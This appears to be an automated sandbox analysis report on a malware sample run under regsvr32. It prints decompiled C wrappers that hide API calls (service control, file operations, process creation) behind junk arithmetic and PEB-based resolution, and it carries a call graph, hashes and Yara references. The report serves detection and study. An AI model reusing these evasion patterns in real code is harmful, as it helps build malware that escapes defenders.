1dbff0 GetPEB 4971->4972 4973 1c2fcc 4972->4973 4973->4945 4975 1e1d80 4974->4975 4976 1dbff0 GetPEB 4975->4976 4977 1cdf59 4976->4977 4977->4857 4979 1d5a82 4978->4979 4980 1dbff0 GetPEB 4979->4980 4981 1d5b29 4980->4981 4981->4964 4983 1de902 4982->4983 4984 1dbff0 GetPEB 4983->4984 4985 1de994 4984->4985 4985->4964 4987 1c3c6f 4986->4987 4988 1c3eff 4987->4988 4999 1d3ff6 4987->4999 4988->4864 4991 1d1d1c GetPEB 4993 1c3eb6 4991->4993 4992 1d1d1c GetPEB 4992->4993 4993->4988 4993->4992 4997 1d0e27 4994->4997 4995 1d0f48 4995->4864 4996 1de9a4 GetPEB 4996->4997 4997->4995 4997->4996 5003 1c3455 4997->5003 5000 1d4017 4999->5000 5001 1dbff0 GetPEB 5000->5001 5002 1c3e94 5001->5002 5002->4988 5002->4991 5004 1c3468 5003->5004 5005 1dbff0 GetPEB 5004->5005 5006 1c3502 5005->5006 5006->4997 5008 1dda29 5007->5008 5009 1dbff0 GetPEB 5008->5009 5010 1c3149 5009->5010 5010->3884 5012 1d5cca 5011->5012 5013 1dbff0 GetPEB 5012->5013 5014 1d5d5a 5013->5014 5014->4084 5017 1d00ae 5015->5017 5016 1d7394 GetPEB 5016->5017 5017->5016 5018 1deaa3 2 API calls 5017->5018 5019 1d040e 5017->5019 5018->5017 5019->4084 5021 1cf61e 5020->5021 5022 1dbff0 GetPEB 5021->5022 5023 1cf6be 5022->5023 5023->4084 5025 1dbff0 GetPEB 5024->5025 5026 1ce370 5025->5026 5026->4084 5028 1cf9bd 5027->5028 5029 1dbff0 GetPEB 5028->5029 5030 1cfa61 5029->5030 5030->4079 5032 1d5c1b 5031->5032 5033 1dbff0 GetPEB 5032->5033 5034 1d5ca5 5033->5034 5034->4088 5036 1ce0fe 5035->5036 5037 1dbff0 GetPEB 5036->5037 5038 1ce19d 5037->5038 5038->4088 5042 1cd8af 5039->5042 5040 1cda67 5063 1cff02 5040->5063 5042->5040 5044 1cda65 5042->5044 5045 1cb184 GetPEB 5042->5045 5059 1d1c3c 5042->5059 5044->4102 5045->5042 5048 1c9425 5046->5048 5047 1c4bb4 2 API calls 5047->5048 5048->5047 5049 1c3f09 GetPEB 5048->5049 5050 1c954c 5048->5050 5052 1cb9d7 GetPEB 5048->5052 5054 1c954a 5048->5054 5067 1d462a 5048->5067 5049->5048 5051 1c3152 GetPEB 5050->5051 5051->5054 5052->5048 5054->4102 5056 1cf6e5 5055->5056 5057 1dbff0 GetPEB 5056->5057 5058 1cf778 5057->5058 5058->4112 5060 1d1c5e 5059->5060 5061 1dbff0 GetPEB 5060->5061 5062 1d1d0f 5061->5062 5062->5042 5064 1cff24 5063->5064 5065 1dbff0 GetPEB 5064->5065 5066 1cffca 5065->5066 5066->5044 5068 1d4649 5067->5068 5069 1dbff0 GetPEB 5068->5069 5070 1d46d3 5069->5070 5070->5048 5081 1c5c9a 5088 1c617c 5081->5088 5082 1c6a8d GetPEB 5082->5088 5083 1dbf1c 2 API calls 5083->5088 5084 1c638d 5085 1c9574 GetPEB 5085->5088 5086 1c638f 5089 1de373 2 API calls 5086->5089 5088->5082 5088->5083 5088->5084 5088->5085 5088->5086 5090 1cffde GetPEB 5088->5090 5091 1deaa3 2 API calls 5088->5091 5094 1dab39 5088->5094 5098 1d589f 5088->5098 5102 1e2727 5088->5102 5089->5084 5090->5088 5091->5088 5095 1dab6c 5094->5095 5096 1dbff0 GetPEB 5095->5096 5097 1dac10 5096->5097 5097->5088 5099 1d58b2 5098->5099 5100 1dbff0 GetPEB 5099->5100 5101 1d5949 5100->5101 5101->5088 5103 1e2737 5102->5103 5104 1dbff0 GetPEB 5103->5104 5105 1e27d3 5104->5105 5105->5088 5119 1c88e5 5120 1c8a5e 5119->5120 5121 1c8aa9 5120->5121 5122 1de18b 2 API calls 5120->5122 5123 1c8a79 5122->5123 5127 1d08c0 5123->5127 5126 1cb9d7 GetPEB 5126->5121 5130 1d08e5 5127->5130 5128 1c8a91 5128->5126 5130->5128 5131 1d19a4 5130->5131 5132 1d19bd 5131->5132 5133 1dbff0 GetPEB 5132->5133 5134 1d1a63 5133->5134 5134->5130 5071 1d63f0 5072 1d641e 5071->5072 5073 1cb184 GetPEB 5072->5073 5074 1d663b 5073->5074 5075 1d46e0 2 API calls 5074->5075 5077 1d6676 5075->5077 5076 1d6683 5077->5076 5078 1de373 2 API calls 5077->5078 5079 1d66a3 5078->5079 5080 1de373 2 API calls 5079->5080 5080->5076

                                                                                                                Executed Functions

                                                                                                                Function 001CF1D5 Relevance: 1.6, APIs: 1, Instructions: 69COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E001CF1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;
				intOrPtr* _t58;
				void* _t59;
				signed int _t62;
				void* _t67;
				void* _t68;

				_t68 = __edx;
				_t67 = __ecx;
				E001C9E7D(_t49);
				_v36 = 0xea873e;
				_v32 = 0xb2392b;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0xdc192d;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 + 0x11b5;
				_v12 = _v12 ^ 0x0007f5c7;
				_v20 = 0x6dcef4;
				_t62 = 0x6b;
				_v20 = _v20 * 0x54;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0xe81a0a50;
				_v16 = 0x9ccfab;
				_v16 = _v16 | 0xc76ed5d6;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x000c5bda;
				_v8 = 0xcca784;
				_v8 = _v8 / _t62;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x01549e3f;
				_v8 = _v8 ^ 0x01571d5c;
				_t58 = E001DBFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
				_t59 =  *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
				return _t59;
			}

















                                                                                                                0x001cf1e5
                                                                                                                0x001cf1ea
                                                                                                                0x001cf1f5
                                                                                                                0x001cf1fa
                                                                                                                0x001cf203
                                                                                                                0x001cf20a
                                                                                                                0x001cf20d
                                                                                                                0x001cf210
                                                                                                                0x001cf217
                                                                                                                0x001cf21b
                                                                                                                0x001cf21f
                                                                                                                0x001cf226
                                                                                                                0x001cf22d
                                                                                                                0x001cf23a
                                                                                                                0x001cf23e
                                                                                                                0x001cf241
                                                                                                                0x001cf245
                                                                                                                0x001cf24c
                                                                                                                0x001cf253
                                                                                                                0x001cf25a
                                                                                                                0x001cf25e
                                                                                                                0x001cf265
                                                                                                                0x001cf276
                                                                                                                0x001cf279
                                                                                                                0x001cf27d
                                                                                                                0x001cf284
                                                                                                                0x001cf2a3
                                                                                                                0x001cf2b0
                                                                                                                0x001cf2b8

                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 001CF2B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction ID: 2282a8455d97445486a70008b0db38033c04ef83d6d10663c97b6c11763cd4bd
                                                                                                                • Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction Fuzzy Hash: 792146B5D0121DAFDB08DFA5C88A8EEBBB4FB44708F10809DE515AA240C7B45B54DFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001C32B5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 498 1c32b5-1c338a call 1c9e7d call 1dbff0 OpenSCManagerW
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E001C32B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t62;
				signed int _t64;
				signed int _t65;

				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				E001C9E7D(_t49);
				_v32 = 0xf329ca;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0x2373b;
				_t64 = 0x7a;
				_v16 = _v16 * 0x75;
				_t65 = 0x3d;
				_v16 = _v16 / _t64;
				_v16 = _v16 ^ 0x00061266;
				_v12 = 0xb7be71;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 + 0xafdb;
				_v12 = _v12 ^ 0x7920a4e8;
				_v12 = _v12 ^ 0x79205c77;
				_v8 = 0x1abc5;
				_v8 = _v8 / _t65;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x07f89b39;
				_v8 = _v8 ^ 0x07caeaee;
				_v20 = 0x49b926;
				_v20 = _v20 * 0x47;
				_v20 = _v20 ^ 0x147483b3;
				E001DBFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
				_t62 = OpenSCManagerW(0, 0, _a4); // executed
				return _t62;
			}














                                                                                                                0x001c32be
                                                                                                                0x001c32bf
                                                                                                                0x001c32c2
                                                                                                                0x001c32c3
                                                                                                                0x001c32c8
                                                                                                                0x001c32cd
                                                                                                                0x001c32d6
                                                                                                                0x001c32d9
                                                                                                                0x001c32dc
                                                                                                                0x001c32e9
                                                                                                                0x001c32ec
                                                                                                                0x001c32f4
                                                                                                                0x001c32f5
                                                                                                                0x001c32fa
                                                                                                                0x001c3304
                                                                                                                0x001c330b
                                                                                                                0x001c330f
                                                                                                                0x001c3316
                                                                                                                0x001c331d
                                                                                                                0x001c3324
                                                                                                                0x001c3335
                                                                                                                0x001c3338
                                                                                                                0x001c333c
                                                                                                                0x001c3343
                                                                                                                0x001c334a
                                                                                                                0x001c3361
                                                                                                                0x001c3364
                                                                                                                0x001c3377
                                                                                                                0x001c3384
                                                                                                                0x001c338a

                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 001C3384
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: w\ y
                                                                                                                • API String ID: 1889721586-240614871
                                                                                                                • Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction ID: 3d7c52043628b31cb1fafec5bc69fd1b4ddc9f9cf6a6296a5842bfa8d41df353
                                                                                                                • Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction Fuzzy Hash: C22123B5D01228FBCB04DFA9D88A9EEBFB5FB40304F208189E425A6250D3B55B40DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001CC4EB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 503 1cc4eb-1cc5c2 call 1c9e7d call 1dbff0 OpenServiceW
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E001CC4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t46;
				void* _t54;
				int _t58;

				_push(_a16);
				_t58 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001C9E7D(_t46);
				_v24 = _v24 & 0x00000000;
				_v36 = 0xd40f1;
				_v32 = 0xcb52a0;
				_v28 = 0x146fa1;
				_v20 = 0xb8dab7;
				_v20 = _v20 >> 1;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x0b80f677;
				_v8 = 0x87dd92;
				_v8 = _v8 + 0xffffe9d3;
				_v8 = _v8 * 0x55;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x54d92ec5;
				_v16 = 0xb88fea;
				_v16 = _v16 | 0xf85cd4fd;
				_v16 = _v16 + 0xed22;
				_v16 = _v16 ^ 0xf8f0d6dc;
				_v12 = 0x2c3d87;
				_v12 = _v12 + 0x3690;
				_v12 = _v12 + 0xfffff048;
				_v12 = _v12 ^ 0x0029d00c;
				E001DBFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
				return _t54;
			}














                                                                                                                0x001cc4f2
                                                                                                                0x001cc4f5
                                                                                                                0x001cc4f7
                                                                                                                0x001cc4fa
                                                                                                                0x001cc4fd
                                                                                                                0x001cc500
                                                                                                                0x001cc501
                                                                                                                0x001cc502
                                                                                                                0x001cc507
                                                                                                                0x001cc50e
                                                                                                                0x001cc515
                                                                                                                0x001cc51c
                                                                                                                0x001cc523
                                                                                                                0x001cc52a
                                                                                                                0x001cc52d
                                                                                                                0x001cc531
                                                                                                                0x001cc538
                                                                                                                0x001cc53f
                                                                                                                0x001cc556
                                                                                                                0x001cc55e
                                                                                                                0x001cc562
                                                                                                                0x001cc569
                                                                                                                0x001cc570
                                                                                                                0x001cc577
                                                                                                                0x001cc57e
                                                                                                                0x001cc585
                                                                                                                0x001cc58c
                                                                                                                0x001cc593
                                                                                                                0x001cc59a
                                                                                                                0x001cc5ad
                                                                                                                0x001cc5bc
                                                                                                                0x001cc5c2

                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 001CC5BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: "
                                                                                                                • API String ID: 3098006287-1598837362
                                                                                                                • Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction ID: 014ad977955a1261e77ad7fbfd0464804424df1a874fc843910935ef878996ad
                                                                                                                • Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction Fuzzy Hash: 562120B6C0020DEBCF15DFA4D8499EEBBB4FF14318F108588E92566260E3B19B18DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001DA98E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 508 1da98e-1daa51 call 1c9e7d call 1dbff0 CloseServiceHandle
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E001DA98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t45;
				int _t58;
				signed int _t60;
				signed int _t61;

				_push(_a8);
				_push(_a4);
				E001C9E7D(_t45);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xdfb18c;
				_v12 = 0xac05d3;
				_v12 = _v12 + 0xffffe692;
				_t60 = 6;
				_v12 = _v12 * 0xa;
				_v12 = _v12 ^ 0x06b0bc77;
				_v20 = 0xcbcea5;
				_t61 = 0x73;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x0026c0c8;
				_v16 = 0x706a69;
				_v16 = _v16 + 0xffff322e;
				_v16 = _v16 ^ 0x006745ff;
				_v8 = 0xc7f3e7;
				_v8 = _v8 * 0x7b;
				_v8 = _v8 + 0xffffee1e;
				_v8 = _v8 / _t61;
				_v8 = _v8 ^ 0x00d4d133;
				E001DBFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
				_t58 = CloseServiceHandle(_a4); // executed
				return _t58;
			}













                                                                                                                0x001da994
                                                                                                                0x001da997
                                                                                                                0x001da99c
                                                                                                                0x001da9a1
                                                                                                                0x001da9a7
                                                                                                                0x001da9ae
                                                                                                                0x001da9b5
                                                                                                                0x001da9c2
                                                                                                                0x001da9c5
                                                                                                                0x001da9c8
                                                                                                                0x001da9cf
                                                                                                                0x001da9db
                                                                                                                0x001da9dc
                                                                                                                0x001da9e1
                                                                                                                0x001da9eb
                                                                                                                0x001da9f2
                                                                                                                0x001da9f9
                                                                                                                0x001daa00
                                                                                                                0x001daa17
                                                                                                                0x001daa1a
                                                                                                                0x001daa2b
                                                                                                                0x001daa2e
                                                                                                                0x001daa41
                                                                                                                0x001daa4c
                                                                                                                0x001daa51

                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 001DAA4C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ijp
                                                                                                                • API String ID: 1725840886-2001787820
                                                                                                                • Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction ID: ebe841db5b2b724f578798753eb9f677dc0131a1d417290f29619c5faace78dd
                                                                                                                • Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction Fuzzy Hash: 182117B5D0520DFBEF04DFA4D98A9AEBBB1EB40304F10C19AE405AB250D7B49B449F84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001C338B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 513 1c338b-1c3454 call 1c9e7d call 1dbff0 SHFileOperationW
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001C338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t46;
				int _t58;
				signed int _t60;

				_push(_a4);
				E001C9E7D(_t46);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x221b15;
				_v20 = 0x156690;
				_t60 = 5;
				_v20 = _v20 * 0x69;
				_v20 = _v20 ^ 0x08c90ac4;
				_v12 = 0x1a8107;
				_v12 = _v12 / _t60;
				_v12 = _v12 | 0x5e0d12b3;
				_v12 = _v12 * 0x36;
				_v12 = _v12 ^ 0xd6d73012;
				_v8 = 0x305b7c;
				_v8 = _v8 + 0xffffaa6a;
				_v8 = _v8 << 0xf;
				_v8 = _v8 | 0xeac0b19d;
				_v8 = _v8 ^ 0xeaf3a664;
				_v16 = 0x5b8d10;
				_v16 = _v16 * 0x69;
				_v16 = _v16 + 0x95d4;
				_v16 = _v16 ^ 0x258da45e;
				E001DBFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
				_t58 = SHFileOperationW(_a4); // executed
				return _t58;
			}













                                                                                                                0x001c3391
                                                                                                                0x001c3396
                                                                                                                0x001c339b
                                                                                                                0x001c33a1
                                                                                                                0x001c33a5
                                                                                                                0x001c33ac
                                                                                                                0x001c33b9
                                                                                                                0x001c33bd
                                                                                                                0x001c33c0
                                                                                                                0x001c33c7
                                                                                                                0x001c33d8
                                                                                                                0x001c33db
                                                                                                                0x001c33f2
                                                                                                                0x001c33f5
                                                                                                                0x001c33fc
                                                                                                                0x001c3403
                                                                                                                0x001c340a
                                                                                                                0x001c340e
                                                                                                                0x001c3415
                                                                                                                0x001c341c
                                                                                                                0x001c3427
                                                                                                                0x001c342a
                                                                                                                0x001c3431
                                                                                                                0x001c3444
                                                                                                                0x001c344f
                                                                                                                0x001c3454

                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 001C344F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID: |[0
                                                                                                                • API String ID: 3080627654-3711761429
                                                                                                                • Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction ID: 89d64456fc19b53e7c52a546aaa4c460278ac256a97eca7fba60c6b7bbe7a22a
                                                                                                                • Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction Fuzzy Hash: 052136B4D00209EFCF04DFA5C98AAEEBBB4FB10304F10818DE424AA250D7B96B548F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001DE373 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E001DE373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				int _t51;
				signed int _t53;
				void* _t58;

				_push(_a8);
				_t58 = __edx;
				_push(_a4);
				_push(__edx);
				E001C9E7D(_t41);
				_v20 = 0xc362e1;
				_v20 = _v20 + 0xffff2419;
				_v20 = _v20 + 0xffff15b9;
				_v20 = _v20 ^ 0x00c90db5;
				_v16 = 0x370fa8;
				_v16 = _v16 + 0x3ddc;
				_v16 = _v16 + 0xfffffca4;
				_v16 = _v16 ^ 0x003af0ce;
				_v8 = 0x58cda3;
				_t53 = 0x37;
				_v8 = _v8 / _t53;
				_v8 = _v8 | 0xee3498e5;
				_v8 = _v8 + 0xffff3fab;
				_v8 = _v8 ^ 0xee3595ac;
				_v12 = 0xe7384d;
				_v12 = _v12 + 0x2a59;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x2c4bf561;
				E001DBFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
				_t51 = CloseHandle(_t58); // executed
				return _t51;
			}











                                                                                                                0x001de37a
                                                                                                                0x001de37d
                                                                                                                0x001de37f
                                                                                                                0x001de382
                                                                                                                0x001de384
                                                                                                                0x001de389
                                                                                                                0x001de392
                                                                                                                0x001de399
                                                                                                                0x001de3a0
                                                                                                                0x001de3a7
                                                                                                                0x001de3ae
                                                                                                                0x001de3b5
                                                                                                                0x001de3bc
                                                                                                                0x001de3c3
                                                                                                                0x001de3cf
                                                                                                                0x001de3d5
                                                                                                                0x001de3d8
                                                                                                                0x001de3df
                                                                                                                0x001de3e6
                                                                                                                0x001de3ed
                                                                                                                0x001de3f4
                                                                                                                0x001de40b
                                                                                                                0x001de413
                                                                                                                0x001de426
                                                                                                                0x001de42f
                                                                                                                0x001de435

                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,001D3F2A,00000000), ref: 001DE42F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: M8
                                                                                                                • API String ID: 2962429428-669864304
                                                                                                                • Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction ID: aeac188e18333a3e4f3ecd998f98219ff37e4a37cfada19d7ae2af9eee80298a
                                                                                                                • Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction Fuzzy Hash: BE1159B5D00209EFDF58DFA4C84989EBBB4EB40324F108299E824B6290D3B55B058F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001D46E0 Relevance: 1.6, APIs: 1, Instructions: 76processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 43%
                                                                                                                			E001D46E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				int _t64;
				signed int _t66;
				struct _PROCESS_INFORMATION* _t72;

				_push(_a68);
				_t72 = __edx;
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E001C9E7D(_t55);
				_v8 = 0x728488;
				_v8 = _v8 + 0x86b5;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xe7c2;
				_v8 = _v8 ^ 0x98526b3c;
				_v16 = 0xdd86ac;
				_v16 = _v16 | 0x9093749e;
				_v16 = _v16 + 0x773d;
				_v16 = _v16 ^ 0x90e3102d;
				_v20 = 0xa04379;
				_v20 = _v20 + 0xe8c2;
				_v20 = _v20 ^ 0x00a70f96;
				_v12 = 0x20815c;
				_t66 = 0x4c;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xbbf973da;
				_v12 = _v12 ^ 0xbbf5b48f;
				E001DBFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
				return _t64;
			}











                                                                                                                0x001d46e8
                                                                                                                0x001d46ed
                                                                                                                0x001d46ef
                                                                                                                0x001d46f2
                                                                                                                0x001d46f5
                                                                                                                0x001d46f8
                                                                                                                0x001d46f9
                                                                                                                0x001d46fc
                                                                                                                0x001d46ff
                                                                                                                0x001d4702
